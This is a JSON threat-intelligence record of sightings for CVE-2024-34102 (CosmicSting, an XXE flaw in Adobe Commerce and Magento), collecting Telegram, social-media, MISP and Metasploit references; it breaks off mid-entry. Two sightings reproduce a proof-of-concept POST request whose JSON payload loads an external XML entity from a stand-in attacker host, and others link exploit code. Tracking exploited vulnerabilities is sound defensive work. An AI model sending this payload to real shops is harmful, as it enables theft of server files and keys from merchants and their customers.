{"vulnerability": "CVE-2024-34102", "sightings": [{"uuid": "dc5caa33-b7a0-4456-996b-28dc56aa907c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "https://t.me/thehackernews/5674", "content": "\ud83d\udea8 A critical vulnerability, CosmicSting (CVE-2024-34102), has hit 5% of Adobe Commerce & Magento stores. \n \n7 hacker groups are injecting malicious scripts. \n \nDetails here: https://thehackernews.com/2024/10/alert-adobe-commerce-and-magento-stores.html \n \nPatching isn\u2019t enough\u2014rotate your encryption keys now!", "creation_timestamp": "2024-10-02T14:45:51.000000Z"}, {"uuid": "a7411f53-d86b-4ed8-9d5a-a1307f8dad7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/BugCod3/615", "content": "CVE-2024-34102  POC \n\nPOST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://attacker*com/xxe.xml\",\"dataIsURL\":true,\"options\":1337}}}}}}\n\n#CVE #POC\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n\ud83d\udc64 T.me/BugCod3BOT \n\ud83d\udce3 T.me/BugCod3", "creation_timestamp": "2024-06-28T00:19:40.000000Z"}, {"uuid": "c5a77e1d-bea4-4a87-9f66-3281cba1e90c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2728", "content": "CVE-2024-34102\n\nPOST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://url/\",\"dataIsURL\":true,\"options\":12345678}}}}}}\n\nhttp://url\n\n#exploit  #poc", "creation_timestamp": "2024-07-02T07:34:49.000000Z"}, {"uuid": "f3fb851e-3bde-4144-bcd4-3076e4fb7691", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/S_E_Reborn/5083", "content": "Cisco \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u044f\u0432\u043d\u043e \u0437\u0430\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u0435\u0442 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u044f.\n\n\u0412\u043e-\u043f\u0435\u0440\u0432\u044b\u0445, \u0432 \u041f\u041e \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u0435\u0442\u0435\u0432\u044b\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c \u043a \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u043c \u0442\u043e\u0447\u043a\u0430\u043c \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0430\u0445 Cisco Identity Services Engine (ISE) \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0438 \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u043c PoC.\n\n\u041a\u0430\u043a \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442\u00a0\u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434\u0430\u0445 CLI \u0432 ISE \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443, \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u043c\u0443 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u043f\u0443\u0442\u0435\u043c \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u0431\u0430\u0437\u043e\u0432\u0443\u044e \u041e\u0421 \u0438 \u043f\u043e\u0432\u044b\u0448\u0430\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u0443\u0440\u043e\u0432\u043d\u044f root.\n\nCVE-2024-20469 \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e\u0439 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u043e\u0439 \u0432\u0432\u043e\u0434\u0438\u043c\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0434\u0430\u043d\u043d\u044b\u0445, \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u0430 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0438\u0437\u043a\u043e\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u044e\u0442 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c.\n\n\u041e\u0434\u043d\u0430\u043a\u043e, \u043a\u0430\u043a \u043f\u043e\u044f\u0441\u043d\u044f\u0435\u0442 Cisco, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u0442\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435, \u0435\u0441\u043b\u0438 \u0443 \u043d\u0438\u0445 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u043d\u0430 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445. \u0414\u043e \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u044d\u0442\u043e\u0433\u043e \u0435\u0449\u0435 \u043d\u0438\u043a\u0442\u043e \u043d\u0435 \u0441\u0434\u0435\u043b\u0430\u043b.\n\n\u0412\u043e-\u0432\u0442\u043e\u0440\u044b\u0445, Cisco \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u043e\u0431\u00a0\u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0438 \u0431\u044d\u043a\u0434\u043e\u0440-\u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430\u00a0\u0432 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 Smart Licensing Utility \u0434\u043b\u044f Windows, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u0445\u043e\u0434\u0430 \u0432 \u043d\u0435\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430.\n\nCSLU - \u044d\u0442\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 Windows, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043f\u043e\u043c\u043e\u0433\u0430\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u044f\u043c\u0438 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u043c\u0438 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e, \u043d\u0435 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u044f \u0438\u0445 \u043a \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u043c\u0443 \u0440\u0435\u0448\u0435\u043d\u0438\u044e Cisco Smart Software Manager.\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f CVE-2024-20439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u043e\u0439\u0442\u0438 \u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0447\u0435\u0440\u0435\u0437 API \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f Cisco Smart Licensing Utility.\n\n\u041f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 CLSU (CVE-2024-20440).\n\n\u041d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0444\u0430\u0439\u043b\u0430\u043c \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u043c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 (\u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 API), \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0435 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430.\n\n\u0415\u0441\u043b\u0438 \u0432\u0441\u0435 \u0432\u044b\u0448\u0435\u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c (\u0432\u043e \u0432\u0441\u044f\u043a\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u043e\u043a\u0430), \u0442\u043e \u0441\u0430\u0439\u0442 Cisco Merchandise Store \u043f\u043e \u043f\u0440\u043e\u0434\u0430\u0436\u0435 \u0442\u043e\u0432\u0430\u0440\u043e\u0432 \u0441 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u0442\u0435\u043c\u0430\u0442\u0438\u043a\u043e\u0439 \u043f\u0435\u0440\u0435\u0436\u0438\u043b \u0430\u0442\u0430\u043a\u0443 CosmicSting (CVE-2024-34102) \u0438 \u0441\u0435\u0439\u0447\u0430\u0441 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043d\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438.\n\n\u0418\u043d\u044b\u043c\u0438 \u0441\u043b\u043e\u0432\u0430\u043c \u0431\u044b\u043b \u0432\u0437\u043b\u043e\u043c\u0430\u043d \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b \u043a\u043e\u0434 JavaScript, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u0440\u0430\u043b \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u0438 \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u0438\u0438 \u0437\u0430\u043a\u0430\u0437\u0430. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0432\u0437\u043b\u043e\u043c \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u0435\u043b \u0432 \u043c\u0438\u043d\u0443\u0432\u0448\u0438\u0435 \u0432\u044b\u0445\u043e\u0434\u043d\u044b\u0435.\n\n\u0421\u0430\u043c\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e\u043a\u0430 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0438\u0440\u0443\u0435\u0442 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442.", "creation_timestamp": "2024-09-05T15:23:32.000000Z"}, {"uuid": "de39dfe7-e268-47d3-bd16-554261f9f427", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10751", "content": "#exploit\n1. CVE-2024-34102:\nMagento XXE\nhttps://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102\n]-> PoC + detect:\nhttps://github.com/jakabakos/CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento\n\n2. Fortra FileCatalyst Workflow Unauth SQLi\nhttps://www.tenable.com/security/research/tra-2024-25\n\n3. Multiple vulnerabilities in TP-Link Omada system could lead to root access\nhttps://blog.talosintelligence.com/multiple-vulnerabilities-in-tp-link-omada-system", "creation_timestamp": "2024-07-17T05:46:19.000000Z"}, {"uuid": "be8edb6f-652d-4757-9a69-69081f1433df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "Telegram/lowHqxZU0Hmci25qV5XivanoaRM_8_vHPyw6C3YOHcY", "content": "", "creation_timestamp": "2024-10-08T08:16:28.000000Z"}, {"uuid": "6756b5c6-dc9a-4973-adc7-b1493546a349", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-07-17T18:10:03.000000Z"}, {"uuid": "fabe5893-e676-4178-ac7a-da76969a99aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://infosec.exchange/users/malmoeb/statuses/113634000996822728", "content": "", "creation_timestamp": "2024-12-11T11:40:52.912218Z"}, {"uuid": "0dc2ecc7-82e6-4f05-be89-7b5a47567cbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113867018300718744", "content": "", "creation_timestamp": "2025-01-21T15:20:14.072020Z"}, {"uuid": "4362e8ac-a56e-4609-b551-35dc123e6ea4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://bsky.app/profile/securityrss.bsky.social/post/3lh2gqbpttk2t", "content": "", "creation_timestamp": "2025-01-31T16:38:36.119298Z"}, {"uuid": "47638f02-d5c9-4a6a-b4bb-6084147d6c47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "8df6c042-aa42-4f2d-9b52-8b4b2e994ca6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:11:03.000000Z"}, {"uuid": "74d69ffc-1deb-4c15-b51f-dd164707632a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://bsky.app/profile/saveam.bsky.social/post/3ljrc7eetf22v", "content": "", "creation_timestamp": "2025-03-07T05:44:37.411834Z"}, {"uuid": "fd8f36c2-927b-42a8-9605-fb5bc01c8c11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://bsky.app/profile/saveam.bsky.social/post/3ljrc7ef46c2v", "content": "", "creation_timestamp": "2025-03-07T05:44:37.970890Z"}, {"uuid": "6b782e2b-ca51-4ef2-a62b-97df06b2577a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://bsky.app/profile/saveam.bsky.social/post/3ljrc7ef55k2v", "content": "", "creation_timestamp": "2025-03-07T05:44:38.539202Z"}, {"uuid": "3ea23865-d5c8-46c8-9d48-df6b4103859d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://bsky.app/profile/saveam.bsky.social/post/3ljrc7ef55l2v", "content": "", "creation_timestamp": "2025-03-07T05:44:39.098400Z"}, {"uuid": "dc06938d-5953-48f5-b28f-1d0d7d70ab63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://bsky.app/profile/saveam.bsky.social/post/3ljrc7ef55m2v", "content": "", "creation_timestamp": "2025-03-07T05:44:39.655787Z"}, {"uuid": "b18856f7-70f4-4c50-8c9c-b9e93ad4068a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:56.000000Z"}, {"uuid": "b9571f1e-e1ac-4bd2-ac16-2719f8d3b703", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3ltnnj5uxxz2x", "content": "", "creation_timestamp": "2025-07-11T01:02:47.311792Z"}, {"uuid": "a3a38af0-184a-4a42-81d8-2a7eb3129177", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-16)", "content": "", "creation_timestamp": "2025-07-16T00:00:00.000000Z"}, {"uuid": "5c0a8844-4d3f-4470-995e-3c731f9cf853", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-24)", "content": "", "creation_timestamp": "2025-07-24T00:00:00.000000Z"}, {"uuid": "2f3dc8ad-70ed-43e1-90a3-724401964313", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:03.000000Z"}, {"uuid": "95d1bb87-8f92-4871-a4e2-0a3834898537", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-07-27)", "content": "", "creation_timestamp": "2025-07-27T00:00:00.000000Z"}, {"uuid": "04a98f05-ac70-4da4-b9c3-6707cda03ba2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://mastodon.social/users/leakix/statuses/115580967399197871", "content": "", "creation_timestamp": "2025-11-20T08:00:03.862722Z"}, {"uuid": "19f38c4e-e20c-4a0f-979b-cd1c0d73dc9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://bsky.app/profile/leakix.bsky.social/post/3m62cerzdhf2u", "content": "", "creation_timestamp": "2025-11-20T08:00:05.412378Z"}, {"uuid": "bd646283-622d-4057-81f0-aa415589ad25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb", "content": "", "creation_timestamp": "2024-07-18T17:56:01.000000Z"}, {"uuid": "da70f840-3fd7-4cc5-9631-48c201fc5c5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:33.000000Z"}, {"uuid": "d239ec7f-93f7-433c-933c-693ee195cfa7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb", "content": "", "creation_timestamp": "2024-10-18T13:02:37.000000Z"}, {"uuid": "8f2e5796-c8bf-4dfa-88d4-aeb45d7d9574", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mhnoxdpm5o2x", "content": "", "creation_timestamp": "2026-03-22T13:52:29.874975Z"}, {"uuid": "908aa034-4a49-4a2b-9209-0482b3b9ce0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/66f2010c-d45e-4f01-b0a2-0df0e7189024", "content": "", "creation_timestamp": "2026-02-02T12:26:33.760134Z"}, {"uuid": "20950a1e-5d0b-4031-8931-f4bbdd4694a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_16/2024", "content": "", "creation_timestamp": "2024-06-13T10:26:36.000000Z"}, {"uuid": "d8d6053f-53c8-4fbc-b4f2-bc69c12bb976", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/66f2010c-d45e-4f01-b0a2-0df0e7189024", "content": "", "creation_timestamp": "2026-02-02T12:26:33.760134Z"}, {"uuid": "45ad4682-a134-4227-a1c9-b91223588da9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7790", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCosmicSting (CVE-2024-34102)\nURL\uff1ahttps://github.com/Chocapikk/CVE-2024-34102\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-28T23:34:36.000000Z"}, {"uuid": "ca2abc3f-d208-46e9-ac4d-a292d04cbc59", "vulnerability_lookup_origin": 